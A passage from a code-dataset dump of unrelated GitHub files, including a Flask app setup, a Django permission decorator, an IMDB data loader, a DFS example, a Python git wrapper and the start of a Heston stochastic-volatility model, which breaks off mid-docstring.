print(organizingContainers(test_data))\n","repo_name":"anshjoseph/problems_hackerrank","sub_path":"Organizing_Containers_of_Balls.py","file_name":"Organizing_Containers_of_Balls.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"504984215","text":"import logging.config\n\nimport os\nimport shutil\nfrom flask import Flask, Blueprint\nfrom flask_rest_app import settings\nfrom flask_rest_app.api.imageops.endpoints.image import ns as imageOps_namespace\nfrom flask_rest_app.api.restplus import api\nfrom flask_rest_app.database import db, IMAGE_LOCAL_LOCATION\n\n\ndef configure_app(flask_app):\n    flask_app.config['SQLALCHEMY_DATABASE_URI'] = settings.SQLALCHEMY_DATABASE_URI\n    flask_app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = settings.SQLALCHEMY_TRACK_MODIFICATIONS\n    flask_app.config['SWAGGER_UI_DOC_EXPANSION'] = settings.RESTPLUS_SWAGGER_UI_DOC_EXPANSION\n    flask_app.config['RESTPLUS_VALIDATE'] = settings.RESTPLUS_VALIDATE\n    flask_app.config['RESTPLUS_MASK_SWAGGER'] = settings.RESTPLUS_MASK_SWAGGER\n    flask_app.config['ERROR_404_HELP'] = settings.RESTPLUS_ERROR_404_HELP\n\ndef initialize_app(flask_app):\n    configure_app(flask_app)\n\n    blueprint = Blueprint('api', __name__, url_prefix='/api')\n    api.init_app(blueprint)\n    api.add_namespace(imageOps_namespace)\n    flask_app.register_blueprint(blueprint)\n\n    db.init_app(flask_app)\n\napp = Flask(__name__)\nlog = logging.getLogger(__name__)\ninitialize_app(app)\n\ndef main():\n    log.info('>>>>> Starting development server at http://{}/api/ <<<<<'.format(app.config['SERVER_NAME']))\n    app.run(host='0.0.0.0', port=8080)\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"cjsanjay/flask_nginx_docker_app","sub_path":"flask_rest_app/flask_rest_app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8552127331","text":"\"\"\"\nDecorator module for permission\n\"\"\"\nimport inspect\nfrom django.db.models import 
Model\n\n\n__all__ = ['permission_required']\n\n\ndef permission_required(perm, queryset_or_model=None,\n                        login_url=None, raise_exception=False):\n    \"\"\"\n    Permission check decorator for classbased/functional generic view\n\n    This decorator works as class, method or function decorator without any\n    modification.\n    DO NOT use ``method_decorator`` or whatever while this decorator will use\n    ``self`` argument for method of classbased generic view.\n\n    Parameters\n    ----------\n    perm : string\n        A permission string\n    queryset_or_model : queryset or model\n        A queryset or model for finding object.\n        With classbased generic view, ``None`` for using view default queryset.\n        When the view does not define ``get_queryset``, ``queryset``,\n        ``get_object``, or ``object`` then ``obj=None`` is used to check\n        permission.\n        With functional generic view, ``None`` for using passed queryset.\n        When non queryset was passed then ``obj=None`` is used to check\n        permission.\n\n    Examples\n    --------\n    >>> # As class decorator\n    >>> @permission_required('auth.change_user')\n    >>> class UpdateAuthUserView(UpdateView):\n    ...     pass\n    >>> # As method decorator\n    >>> class UpdateAuthUserView(UpdateView):\n    ...     @permission_required('auth.change_user')\n    ...     def dispatch(self, request, *args, **kwargs):\n    ...         pass\n    >>> # As function decorator\n    >>> @permission_required('auth.change_user')\n    >>> def update_auth_user(request, *args, **kwargs):\n    ...     pass\n\n    .. Note::\n        Classbased generic view is recommended while you can regulate the queryset\n        with ``get_queryset()`` method.\n        Detecting object from passed kwargs may not work correctly.\n    \"\"\"\n    # convert model to queryset (guarded with isinstance so that passing a\n    # queryset instance does not make issubclass() raise TypeError)\n    if isinstance(queryset_or_model, type) and issubclass(queryset_or_model, Model):\n        queryset_or_model = queryset_or_model._default_manager.all()\n\n    def wrapper(class_or_method):\n        if inspect.isclass(class_or_method):\n            from permission.decorators.classbase import \\\n                permission_required as decorator\n        else:\n            # method_permission_required can handle method or function\n            # correctly.\n            from permission.decorators.methodbase import \\\n                permission_required as decorator\n        return decorator(perm, queryset_or_model,\n                         login_url, raise_exception)(class_or_method)\n    return wrapper\n","repo_name":"jazzband/django-permission","sub_path":"src/permission/decorators/permission_required.py","file_name":"permission_required.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","stars":303,"dataset":"github-code","pt":"53"} +{"seq_id":"41853843196","text":"# %% Utility Module of crisp-nlp\n\n\"\"\"\nThe utility module allows the user to conduct logistical and tedious steps seamlessly with repeatable functions.\n\"\"\"\n\n# %% Import necessary modules\n\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom nltk.corpus import stopwords\nfrom tqdm import tqdm\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns \nimport pandas as pd \nimport numpy as np \n\nimport time\nimport os\n\n# %% Define load imdb data\n\ndef load_imdb_train_data(path_to_data, random_state=0):\n\n    # Create path to train folder\n    path_to_train = os.path.join(path_to_data, \"train\")\n\n    # Get training files\n    train_files = os.listdir(path_to_train)\n    # idx - neg\n    neg_idx = train_files.index(\"neg\")\n    path_to_train_neg = os.path.join(path_to_train, train_files[neg_idx])\n    # idx - pos\n    pos_idx = train_files.index(\"pos\")\n    path_to_train_pos = os.path.join(path_to_train, train_files[pos_idx])\n\n    # Import training data\n    train_data = pd.DataFrame([])\n    
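# NOTE: zip pairs the i-th negative file with the i-th positive file, so\n    # each loop iteration below appends exactly one review of each class.\n    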
print(\"... acquiring data from folder and creating dataframe ...\")\n    for negative, positive in tqdm(\n        zip(\n            os.listdir(path_to_train_neg), os.listdir(path_to_train_pos)\n        )\n    ):\n\n        # Open and read the negative instance of text into a variable\n        with open(os.path.join(path_to_train_neg, negative), \"r\") as reader:\n            negative_plain_text = reader.read()\n        # Open and read the positive instance of text into a variable\n        with open(os.path.join(path_to_train_pos, positive), \"r\") as reader:\n            positive_plain_text = reader.read()\n\n        # Transfer the text for the negative review from the training folder into a dataframe\n        df_neg = pd.DataFrame({\"text\": [negative_plain_text], \"sentiment\": [0]})\n        # Transfer the text for the positive review from the training folder into a dataframe\n        df_pos = pd.DataFrame({\"text\": [positive_plain_text], \"sentiment\": [1]})\n        # Concatenate the negative and positive reviews on to the training dataframe\n        train_data = pd.concat([train_data, df_neg, df_pos])\n\n    # Shuffle rows to eliminate neg-pos alternation\n    train_data = (\n        train_data\n        .sample(frac=1, random_state=random_state)\n        .reset_index(drop=True)\n    )\n\n    return train_data\n# %%\n","repo_name":"907Resident/idmb-sentiment-clf","sub_path":"src/crisp-nlp/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21050701189","text":"# The example graph from above is represented here as an adjacency list!\ngraph = {\n    1: [2, 5, 9],\n    2: [1, 3],\n    3: [2, 4],\n    4: [3],\n    5: [1, 6, 8],\n    6: [5, 7],\n    7: [6],\n    8: [5],\n    9: [1, 10],\n    10: [9]\n}\nvisited = []\n\n# 1. starting node 1\n# 2. visit next node and append in the visited array\n# 3. in the current node check the adjacent nodes and see which one we need to visit\n# 4. recurse until every reachable node has been visited\n\n\n\ndef dfs_recursion(adjacent_graph, cur, visited):\n    visited.append(cur)\n    for adjacent_node in adjacent_graph[cur]:\n        if adjacent_node not in visited:\n            dfs_recursion(adjacent_graph, adjacent_node, visited)\n    return\n\n\ndfs_recursion(graph, 1, visited) # 1 is the starting node!\nprint(visited) # [1, 2, 3, 4, 5, 6, 7, 8, 9, 10] should be printed!","repo_name":"skylermbang/Lectures-","sub_path":"hanghae99/sparta_algo/Week4/04_DFTbyRecursion.py","file_name":"04_DFTbyRecursion.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2627359359","text":"\"\"\"\nPython wrapper for git.\n\nThis module is a light Python API for interfacing with git. 
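A minimal usage sketch (the\nrepository path here is hypothetical):\n\n    repo = Repo(\"/path/to/project/.git\")\n    for branch in repo.branch_names():\n        print(branch)\n\n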
It calls the git\ncommand line tool directly, so please be careful with using untrusted\nparameters.\n\"\"\"\n\nimport functools\nimport sys\nimport io\nimport subprocess\nfrom collections import defaultdict\nimport email.utils\nimport datetime\nimport urllib.request, urllib.parse, urllib.error\nfrom html import escape\nfrom typing import Any, Dict, IO, Iterable, List, Optional, Tuple, Union\n\n\n# Path to the git binary.\nGIT_BIN = \"git\"\n\n\ndef run_git(\n    repo_path: str, params, stdin: bytes = None, silent_stderr=False, raw=False\n) -> Union[IO[str], IO[bytes]]:\n    \"\"\"Invokes git with the given parameters.\n\n    This function invokes git with the given parameters, and returns a\n    file-like object with the output (from a pipe).\n    \"\"\"\n    params = [GIT_BIN, \"--git-dir=%s\" % repo_path] + list(params)\n\n    stderr = None\n    if silent_stderr:\n        stderr = subprocess.PIPE\n\n    if not stdin:\n        p = subprocess.Popen(\n            params, stdin=None, stdout=subprocess.PIPE, stderr=stderr\n        )\n    else:\n        p = subprocess.Popen(\n            params,\n            stdin=subprocess.PIPE,\n            stdout=subprocess.PIPE,\n            stderr=stderr,\n        )\n        # Feed stdin only when input was actually provided; otherwise\n        # p.stdin is None and writing to it would crash.\n        assert p.stdin is not None\n        p.stdin.write(stdin)\n        p.stdin.close()\n\n    assert p.stdout is not None\n\n    if raw:\n        return p.stdout\n\n    return io.TextIOWrapper(\n        p.stdout, encoding=\"utf8\", errors=\"backslashreplace\"\n    )\n\n\nclass GitCommand(object):\n    \"\"\"Convenient way of invoking git.\"\"\"\n\n    def __init__(self, path: str, cmd: str):\n        self._override = True\n        self._path = path\n        self._cmd = cmd\n        self._args: List[str] = []\n        self._kwargs: Dict[str, str] = {}\n        self._stdin_buf: Optional[bytes] = None\n        self._raw = False\n        self._override = False\n\n    def __setattr__(self, k, v):\n        if k == \"_override\" or self._override:\n            self.__dict__[k] = v\n            return\n        k = k.replace(\"_\", \"-\")\n        self._kwargs[k] = v\n\n    def arg(self, a: str):\n        \"\"\"Adds an argument.\"\"\"\n        self._args.append(a)\n\n    def raw(self, b: bool):\n        \"\"\"Request raw rather than utf8-encoded command output.\"\"\"\n        self._override = True\n        self._raw = b\n        self._override = False\n\n    def stdin(self, s: bytes):\n        \"\"\"Sets the contents we will send in stdin.\"\"\"\n        self._override = True\n        self._stdin_buf = s\n        self._override = False\n\n    def run(self):\n        \"\"\"Runs the git command.\"\"\"\n        params = [self._cmd]\n\n        for k, v in list(self._kwargs.items()):\n            dash = \"--\" if len(k) > 1 else \"-\"\n            if v is None:\n                params.append(\"%s%s\" % (dash, k))\n            else:\n                params.append(\"%s%s=%s\" % (dash, k, str(v)))\n\n        params.extend(self._args)\n\n        return run_git(self._path, params, self._stdin_buf, raw=self._raw)\n\n\nclass SimpleNamespace(object):\n    \"\"\"An entirely flexible object, which provides a convenient namespace.\"\"\"\n\n    def __init__(self, **kwargs):\n        self.__dict__.update(kwargs)\n\n\nclass smstr:\n    \"\"\"A \"smart\" string, containing many representations for ease of use.\"\"\"\n\n    raw: str # string, probably utf8-encoded, good enough to show.\n    url: str # escaped for safe embedding in URLs (not human-readable).\n    html: str # HTML-embeddable representation.\n\n    def __init__(self, s: str):\n        self.raw = s\n        self.url = urllib.request.pathname2url(s)\n        self.html = self._to_html()\n\n    # Note we don't define __repr__() or __str__() to prevent accidental\n    # misuse. 
It does mean that some uses become more annoying, so it's a\n # tradeoff that may change in the future.\n\n @staticmethod\n def from_url(url):\n \"\"\"Returns an smstr() instance from an url-encoded string.\"\"\"\n return smstr(urllib.request.url2pathname(url))\n\n def split(self, sep):\n \"\"\"Like str.split().\"\"\"\n return [smstr(s) for s in self.raw.split(sep)]\n\n def __add__(self, other):\n if isinstance(other, smstr):\n other = other.raw\n return smstr(self.raw + other)\n\n def _to_html(self):\n \"\"\"Returns an html representation of the unicode string.\"\"\"\n html = \"\"\n for c in escape(self.raw):\n if c in \"\\t\\r\\n\\r\\f\\a\\b\\v\\0\":\n esc_c = c.encode(\"unicode-escape\").decode(\"utf8\")\n html += '%s' % esc_c\n else:\n html += c\n\n return html\n\n\ndef unquote(s: str):\n \"\"\"Git can return quoted file names, unquote them. Always return a str.\"\"\"\n if not (s[0] == '\"' and s[-1] == '\"'):\n # Unquoted strings are always safe, no need to mess with them\n return s\n\n # The string will be of the form `\"\"`, where is a\n # backslash-escaped representation of the name of the file.\n # Examples: \"with\\ttwo\\ttabs\" , \"\\303\\261aca-utf8\", \"\\361aca-latin1\"\n\n # Get rid of the quotes, we never want them in the output.\n s = s[1:-1]\n\n # Un-escape the backslashes.\n # latin1 is ok to use here because in Python it just maps the code points\n # 0-255 to the bytes 0x-0xff, which is what we expect.\n s = s.encode(\"latin1\").decode(\"unicode-escape\")\n\n # Convert to utf8.\n s = s.encode(\"latin1\").decode(\"utf8\", errors=\"backslashreplace\")\n\n return s\n\n\nclass Repo:\n \"\"\"A git repository.\"\"\"\n\n def __init__(self, path: str, name=None, info=None):\n self.path = path\n self.name = name\n self.info: Any = info or SimpleNamespace()\n\n def cmd(self, cmd):\n \"\"\"Returns a GitCommand() on our path.\"\"\"\n return GitCommand(self.path, cmd)\n\n @functools.lru_cache\n def _for_each_ref(self, pattern=None, sort=None, count=None):\n \"\"\"Returns a list of references.\"\"\"\n cmd = self.cmd(\"for-each-ref\")\n if sort:\n cmd.sort = sort\n if count:\n cmd.count = count\n if pattern:\n cmd.arg(pattern)\n\n refs = []\n for l in cmd.run():\n obj_id, obj_type, ref = l.split()\n refs.append((obj_id, obj_type, ref))\n return refs\n\n @functools.cache\n def branch_names(self):\n \"\"\"Get the names of the branches.\"\"\"\n refs = self._for_each_ref(pattern=\"refs/heads/\", sort=\"-authordate\")\n return [ref[len(\"refs/heads/\") :] for _, _, ref in refs]\n\n @functools.cache\n def tags(self, sort=\"-taggerdate\"):\n \"\"\"Get the (name, obj_id) of the tags.\"\"\"\n refs = self._for_each_ref(pattern=\"refs/tags/\", sort=sort)\n return [(ref[len(\"refs/tags/\") :], obj_id) for obj_id, _, ref in refs]\n\n @functools.lru_cache\n def commit_ids(self, ref, limit=None):\n \"\"\"Generate commit ids.\"\"\"\n cmd = self.cmd(\"rev-list\")\n if limit:\n cmd.max_count = limit\n\n cmd.arg(ref)\n cmd.arg(\"--\")\n\n return [l.rstrip(\"\\n\") for l in cmd.run()]\n\n @functools.lru_cache\n def commit(self, commit_id):\n \"\"\"Return a single commit.\"\"\"\n cs = list(self.commits(commit_id, limit=1))\n if len(cs) != 1:\n return None\n return cs[0]\n\n @functools.lru_cache\n def commits(self, ref, limit, offset=0):\n \"\"\"Generate commit objects for the ref.\"\"\"\n cmd = self.cmd(\"rev-list\")\n cmd.max_count = limit + offset\n\n cmd.header = None\n\n cmd.arg(ref)\n cmd.arg(\"--\")\n\n info_buffer = \"\"\n count = 0\n commits = []\n for l in cmd.run():\n if \"\\0\" in l:\n pre, 
post = l.split(\"\\0\", 1)\n info_buffer += pre\n\n count += 1\n if count > offset:\n commits.append(Commit.from_str(self, info_buffer))\n\n # Start over.\n info_buffer = post\n else:\n info_buffer += l\n\n if info_buffer:\n count += 1\n if count > offset:\n commits.append(Commit.from_str(self, info_buffer))\n\n return commits\n\n @functools.lru_cache\n def diff(self, ref):\n \"\"\"Return a Diff object for the ref.\"\"\"\n cmd = self.cmd(\"diff-tree\")\n cmd.patch = None\n cmd.numstat = None\n cmd.find_renames = None\n if self.info.root_diff:\n cmd.root = None\n # Note we intentionally do not use -z, as the filename is just for\n # reference, and it is safer to let git do the escaping.\n\n cmd.arg(ref)\n\n return Diff.from_str(cmd.run())\n\n @functools.lru_cache\n def refs(self):\n \"\"\"Return a dict of obj_id -> ref.\"\"\"\n cmd = self.cmd(\"show-ref\")\n cmd.dereference = None\n\n r = defaultdict(list)\n for l in cmd.run():\n l = l.strip()\n obj_id, ref = l.split(\" \", 1)\n r[obj_id].append(ref)\n\n return r\n\n @functools.lru_cache\n def tree(self, ref):\n \"\"\"Returns a Tree instance for the given ref.\"\"\"\n return Tree(self, ref)\n\n @functools.lru_cache\n def blob(self, path, ref):\n \"\"\"Returns a Blob instance for the given path.\"\"\"\n cmd = self.cmd(\"cat-file\")\n cmd.raw(True)\n cmd.batch = \"%(objectsize)\"\n\n # Format: :\n # Construct it in binary since the path might not be utf8.\n cmd.stdin(ref.encode(\"utf8\") + b\":\" + path)\n\n out = cmd.run()\n head = out.readline()\n if not head or head.strip().endswith(b\"missing\"):\n return None\n\n return Blob(out.read()[: int(head)])\n\n @functools.cache\n def last_commit_timestamp(self):\n \"\"\"Return the timestamp of the last commit.\"\"\"\n refs = self._for_each_ref(\n pattern=\"refs/heads/\", sort=\"-committerdate\", count=1\n )\n for obj_id, _, _ in refs:\n commit = self.commit(obj_id)\n return commit.committer_epoch\n return -1\n\n\nclass Commit(object):\n \"\"\"A git commit.\"\"\"\n\n def __init__(\n self,\n repo,\n commit_id,\n parents,\n tree,\n author,\n author_epoch,\n author_tz,\n committer,\n committer_epoch,\n committer_tz,\n message,\n ):\n self._repo = repo\n self.id = commit_id\n self.parents = parents\n self.tree = tree\n self.author = author\n self.author_epoch = author_epoch\n self.author_tz = author_tz\n self.committer = committer\n self.committer_epoch = committer_epoch\n self.committer_tz = committer_tz\n self.message = message\n\n self.author_name, self.author_email = email.utils.parseaddr(\n self.author\n )\n\n self.committer_name, self.committer_email = email.utils.parseaddr(\n self.committer\n )\n\n self.subject, self.body = self.message.split(\"\\n\", 1)\n\n self.author_date = Date(self.author_epoch, self.author_tz)\n self.committer_date = Date(self.committer_epoch, self.committer_tz)\n\n # Only get this lazily when we need it; most of the time it's not\n # required by the caller.\n self._diff = None\n\n def __repr__(self):\n return \"\" % (\n self.id[:7],\n \",\".join(p[:7] for p in self.parents),\n self.author_email,\n self.subject[:20],\n )\n\n @property\n def diff(self):\n \"\"\"Return the diff for this commit, in unified format.\"\"\"\n if not self._diff:\n self._diff = self._repo.diff(self.id)\n return self._diff\n\n @staticmethod\n def from_str(repo, buf):\n \"\"\"Parses git rev-list output, returns a commit object.\"\"\"\n if \"\\n\\n\" in buf:\n # Header, commit message\n header, raw_message = buf.split(\"\\n\\n\", 1)\n else:\n # Header only, no commit message\n header, raw_message = 
buf.rstrip(), \" \"\n\n header_lines = header.split(\"\\n\")\n commit_id = header_lines.pop(0)\n\n header_dict = defaultdict(list)\n for line in header_lines:\n k, v = line.split(\" \", 1)\n header_dict[k].append(v)\n\n tree = header_dict[\"tree\"][0]\n parents = set(header_dict[\"parent\"])\n\n authorhdr = header_dict[\"author\"][0]\n author, author_epoch, author_tz = authorhdr.rsplit(\" \", 2)\n\n committerhdr = header_dict[\"committer\"][0]\n committer, committer_epoch, committer_tz = committerhdr.rsplit(\" \", 2)\n\n # Remove the first four spaces from the message's lines.\n message = \"\"\n for line in raw_message.split(\"\\n\"):\n message += line[4:] + \"\\n\"\n\n return Commit(\n repo,\n commit_id=commit_id,\n tree=tree,\n parents=parents,\n author=author,\n author_epoch=author_epoch,\n author_tz=author_tz,\n committer=committer,\n committer_epoch=committer_epoch,\n committer_tz=committer_tz,\n message=message,\n )\n\n\nclass Date:\n \"\"\"Handy representation for a datetime from git.\"\"\"\n\n def __init__(self, epoch, tz):\n self.epoch = int(epoch)\n self.tz = tz\n self.utc = datetime.datetime.utcfromtimestamp(self.epoch)\n\n self.tz_sec_offset_min = int(tz[1:3]) * 60 + int(tz[4:])\n if tz[0] == \"-\":\n self.tz_sec_offset_min = -self.tz_sec_offset_min\n\n self.local = self.utc + datetime.timedelta(\n minutes=self.tz_sec_offset_min\n )\n\n self.str = self.utc.strftime(\"%a, %d %b %Y %H:%M:%S +0000 \")\n self.str += \"(%s %s)\" % (self.local.strftime(\"%H:%M\"), self.tz)\n\n def __str__(self):\n return self.str\n\n\nclass Diff:\n \"\"\"A diff between two trees.\"\"\"\n\n def __init__(self, ref, changes, body):\n \"\"\"Constructor.\n\n - ref: reference id the diff refers to.\n - changes: [ (added, deleted, filename), ... ]\n - body: diff body, as text, verbatim.\n \"\"\"\n self.ref = ref\n self.changes = changes\n self.body = body\n\n @staticmethod\n def from_str(buf):\n \"\"\"Parses git diff-tree output, returns a Diff object.\"\"\"\n lines = iter(buf)\n try:\n ref_id = next(lines)\n except StopIteration:\n # No diff; this can happen in merges without conflicts.\n return Diff(None, [], \"\")\n\n # First, --numstat information.\n changes = []\n l = next(lines)\n while l != \"\\n\":\n l = l.rstrip(\"\\n\")\n added, deleted, fname = l.split(\"\\t\", 2)\n added = added.replace(\"-\", \"0\")\n deleted = deleted.replace(\"-\", \"0\")\n fname = smstr(unquote(fname))\n changes.append((int(added), int(deleted), fname))\n l = next(lines)\n\n # And now the diff body. 
We just store as-is, we don't really care for\n # the contents.\n body = \"\".join(lines)\n\n return Diff(ref_id, changes, body)\n\n\nclass Tree:\n \"\"\"A git tree.\"\"\"\n\n def __init__(self, repo: Repo, ref: str):\n self.repo = repo\n self.ref = ref\n\n @functools.lru_cache\n def ls(\n self, path, recursive=False\n ) -> Iterable[Tuple[str, smstr, Optional[int]]]:\n \"\"\"Generates (type, name, size) for each file in path.\"\"\"\n cmd = self.repo.cmd(\"ls-tree\")\n cmd.long = None\n if recursive:\n cmd.r = None\n cmd.t = None\n\n cmd.arg(self.ref)\n if not path:\n cmd.arg(\".\")\n else:\n cmd.arg(path)\n\n files = []\n for l in cmd.run():\n _mode, otype, _oid, size, name = l.split(None, 4)\n if size == \"-\":\n size = None\n else:\n size = int(size)\n\n # Remove the quoting (if any); will always give us a str.\n name = unquote(name.strip(\"\\n\"))\n\n # Strip the leading path, the caller knows it and it's often\n # easier to work with this way.\n name = name[len(path) :]\n\n # We use a smart string for the name, as it's often tricky to\n # manipulate otherwise.\n files.append((otype, smstr(name), size))\n\n return files\n\n\nclass Blob:\n \"\"\"A git blob.\"\"\"\n\n def __init__(self, raw_content: bytes):\n self.raw_content = raw_content\n self._utf8_content = None\n\n @property\n def utf8_content(self):\n if not self._utf8_content:\n self._utf8_content = self.raw_content.decode(\"utf8\", \"replace\")\n return self._utf8_content\n","repo_name":"albertito/git-arr","sub_path":"git.py","file_name":"git.py","file_ext":"py","file_size_in_byte":16607,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"30730332669","text":"import numpy as np\nimport tensorflow.compat.v2 as tf\n\nfrom tf_quant_finance.math import piecewise\nfrom tf_quant_finance.math import random_ops as random\nfrom tf_quant_finance.models import generic_ito_process\nfrom tf_quant_finance.models import utils\n\n\n_SQRT_2 = np.sqrt(2., dtype=np.float64)\n\n\nclass HestonModel(generic_ito_process.GenericItoProcess):\n \"\"\"Heston Model with piecewise constant parameters.\n\n Represents the Ito process:\n\n ```None\n dX(t) = -V(t) / 2 * dt + sqrt(V(t)) * dW_{X}(t),\n dV(t) = kappa(t) * (theta(t) - V(t)) * dt\n + epsilon(t) * sqrt(V(t)) * dW_{V}(t)\n ```\n\n where `W_{X}` and `W_{V}` are 1D Brownian motions with a correlation\n `rho(t)`. `kappa`, `theta`, `epsilon`, and `rho` are positive piecewise\n constant functions of time. Here `V(t)` represents the process variance at\n time `t` and `X` represents logarithm of the spot price at time `t`.\n\n `kappa` corresponds to the mean reversion rate, `theta` is the long run\n price variance, and `epsilon` is the volatility of the volatility.\n\n See [1] and [2] for details.\n\n #### Example\n\n ```python\n import tf_quant_finance as tff\n import numpy as np\n epsilon = PiecewiseConstantFunc(\n jump_locations=[0.5], values=[1, 1.1], dtype=np.float64)\n process = HestonModel(kappa=0.5, theta=0.04, epsilon=epsilon, rho=0.1,\n dtype=np.float64)\n times = np.linspace(0.0, 1.0, 1000)\n num_samples = 10000 # number of trajectories\n sample_paths = process.sample_paths(\n times,\n time_step=0.01,\n num_samples=num_samples,\n initial_state=np.array([1.0, 0.04]),\n random_type=random.RandomType.SOBOL)\n ```\n\n #### References:\n [1]: Cristian Homescu. Implied volatility surface: construction\n methodologies and characteristics.\n arXiv: https://arxiv.org/pdf/1107.1834.pdf\n [2]: Leif Andersen. 
Efficient Simulation of the Heston Stochastic\n    Volatility Models. 2006.\n    Link:\n    http://www.ressources-actuarielles.net/ext/isfa/1226.nsf/d512ad5b22d73cc1c1257052003f1aed/1826b88b152e65a7c12574b000347c74/$FILE/LeifAndersenHeston.pdf\n  \"\"\"\n\n  def __init__(self,\n               kappa,\n               theta,\n               epsilon,\n               rho,\n               dtype=None,\n               name=None):\n    \"\"\"Initializes the Heston Model.\n\n    #### References:\n    [1]: Leif Andersen. Efficient Simulation of the Heston Stochastic\n      Volatility Models. 2006.\n      Link:\n      http://www.ressources-actuarielles.net/ext/isfa/1226.nsf/d512ad5b22d73cc1c1257052003f1aed/1826b88b152e65a7c12574b000347c74/$FILE/LeifAndersenHeston.pdf\n    Args:\n      kappa: Scalar real `Tensor` or an instance of batch-free left-continuous\n        `PiecewiseConstantFunc`. Should contain a positive value.\n        Corresponds to the mean reversion rate.\n      theta: Scalar real `Tensor` or an instance of batch-free left-continuous\n        `PiecewiseConstantFunc`. Should contain a positive value of the same\n        `dtype` as `kappa`.\n        Corresponds to the long run price variance.\n      epsilon: Scalar real `Tensor` or an instance of batch-free left-continuous\n        `PiecewiseConstantFunc`. Should contain a positive value of the same\n        `dtype` as `kappa`.\n        Corresponds to the volatility of the volatility.\n      rho: Scalar real `Tensor` or an instance of batch-free left-continuous\n        `PiecewiseConstantFunc`. Should contain a value in range (-1, 1) of the\n        same `dtype` as `kappa`.\n        Corresponds to the correlation between `dW_{X}` and `dW_{V}`.\n      dtype: The default dtype to use when converting values to `Tensor`s.\n        Default value: `None` which means that default dtypes inferred by\n        TensorFlow are used.\n      name: Python string. The name to give to the ops created by this class.\n        Default value: `None` which maps to the default name `heston_model`.\n    \"\"\"\n    self._name = name or 'heston_model'\n    with tf.compat.v1.name_scope(self._name,\n                                 values=[kappa, theta, epsilon, rho]):\n      self._dtype = dtype or None\n      self._kappa = kappa if isinstance(\n          kappa, piecewise.PiecewiseConstantFunc) else tf.convert_to_tensor(\n              kappa, dtype=self._dtype, name='kappa')\n      self._theta = theta if isinstance(\n          theta, piecewise.PiecewiseConstantFunc) else tf.convert_to_tensor(\n              theta, dtype=self._dtype, name='theta')\n      self._epsilon = epsilon if isinstance(\n          epsilon, piecewise.PiecewiseConstantFunc) else tf.convert_to_tensor(\n              epsilon, dtype=self._dtype, name='epsilon')\n      self._rho = rho if isinstance(\n          rho, piecewise.PiecewiseConstantFunc) else tf.convert_to_tensor(\n              rho, dtype=self._dtype, name='rho')\n\n    def _vol_fn(t, x):\n      \"\"\"Volatility function of the Heston Process.\"\"\"\n      # For correlated brownian motions W_{X} and W_{V} with correlation\n      # `rho(t)`, one can write\n      # W_{V}(t) = rho(t) * W_{X}(t) + sqrt(1 - rho(t)**2) * W_{Z}(t)\n      # where W_{Z}(t) is a Brownian motion independent from W_{X} and W_{V}\n      # Volatility matrix for Heston model is then\n      # [[sqrt(V(t)), 0],\n      # [epsilon(t) * rho(t) * sqrt(V(t)), epsilon(t) * sqrt(1-rho**2) * sqrt(V(t))]]\n      vol = tf.sqrt(tf.abs(x[..., 1]))\n      zeros = tf.zeros_like(vol)\n      # Get parameter values at time `t`\n      rho, epsilon = _get_parameters([t], self._rho, self._epsilon) # pylint: disable=unbalanced-tuple-unpacking\n      rho, epsilon = rho[0], epsilon[0]\n      # First column of the volatility matrix\n      vol_matrix_1 = tf.stack([vol, epsilon * rho * vol], -1)\n      # Second column of the volatility matrix\n      vol_matrix_2 = tf.stack([zeros, epsilon * tf.sqrt(1 - rho**2) * vol], -1)\n      vol_matrix = tf.stack([vol_matrix_1, vol_matrix_2], -1)\n      return 
vol_matrix\n\n    def _drift_fn(t, x):\n      var = x[..., 1]\n      # Get parameter values at time `t`\n      kappa, theta = _get_parameters([t], self._kappa, self._theta) # pylint: disable=unbalanced-tuple-unpacking\n      kappa, theta = kappa[0], theta[0]\n      log_spot_drift = -var / 2\n      var_drift = kappa * (theta - var)\n      drift = tf.stack([log_spot_drift, var_drift], -1)\n      return drift\n\n    super(HestonModel, self).__init__(2, _drift_fn, _vol_fn, dtype, name)\n\n  def sample_paths(self,\n                   times,\n                   initial_state,\n                   num_samples=1,\n                   random_type=None,\n                   seed=None,\n                   time_step=None,\n                   skip=0,\n                   tolerance=1e-6,\n                   name=None):\n    \"\"\"Returns a sample of paths from the process.\n\n    Using the Quadratic-Exponential (QE) method described in [1], generates sample\n    paths started at time zero and returns path values at the specified time\n    points.\n\n    Args:\n      times: Rank 1 `Tensor` of positive real values. The times at which the\n        path points are to be evaluated.\n      initial_state: A rank 1 `Tensor` with two elements where the first element\n        corresponds to the initial value of the log spot `X(0)` and the second\n        to the starting variance value `V(0)`.\n      num_samples: Positive scalar `int`. The number of paths to draw.\n      random_type: Enum value of `RandomType`. The type of (quasi)-random\n        number generator to use to generate the paths.\n        Default value: None which maps to the standard pseudo-random numbers.\n      seed: Seed for the random number generator. The seed is\n        only relevant if `random_type` is one of\n        `[STATELESS, PSEUDO, HALTON_RANDOMIZED, PSEUDO_ANTITHETIC,\n        STATELESS_ANTITHETIC]`. For `PSEUDO`, `PSEUDO_ANTITHETIC` and\n        `HALTON_RANDOMIZED` the seed should be a Python integer. For\n        `STATELESS` and `STATELESS_ANTITHETIC` it must be supplied as an integer\n        `Tensor` of shape `[2]`.\n        Default value: `None` which means no seed is set.\n      time_step: Positive Python float to denote time discretization parameter.\n      skip: `int32` 0-d `Tensor`. The number of initial points of the Sobol or\n        Halton sequence to skip. Used only when `random_type` is 'SOBOL',\n        'HALTON', or 'HALTON_RANDOMIZED', otherwise ignored.\n      tolerance: Scalar positive real `Tensor`. Specifies the minimum time tolerance\n        for which the stochastic process `X(t) != X(t + 